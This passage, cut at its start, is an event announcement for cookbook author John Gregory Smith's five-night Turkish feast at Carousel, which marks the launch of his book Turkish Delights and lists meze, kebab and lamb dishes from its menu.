and cookbook author John Gregory Smith is launching a new book, Turkish Delights, on 10th September and to celebrate he’s cooking a Turkish themed feast for five nights only at Carousel. Running from the 1st to 5th September this is your chance to try recipes from the book cooked by the man himself. On the menu you can expect to see everything from meze dishes like ‘Haydari’ and ‘Muhammara’ (accompanied by homemade flatbreads) to ‘Charcoal Grilled Sardines’ and the fiery ‘Ali Nasik Kebab’. The main event will be marinated Lamb Tenderloin, seared on the grill and served with Labna, Smoked Aubergine Paste and unctuous Chilli Butter.
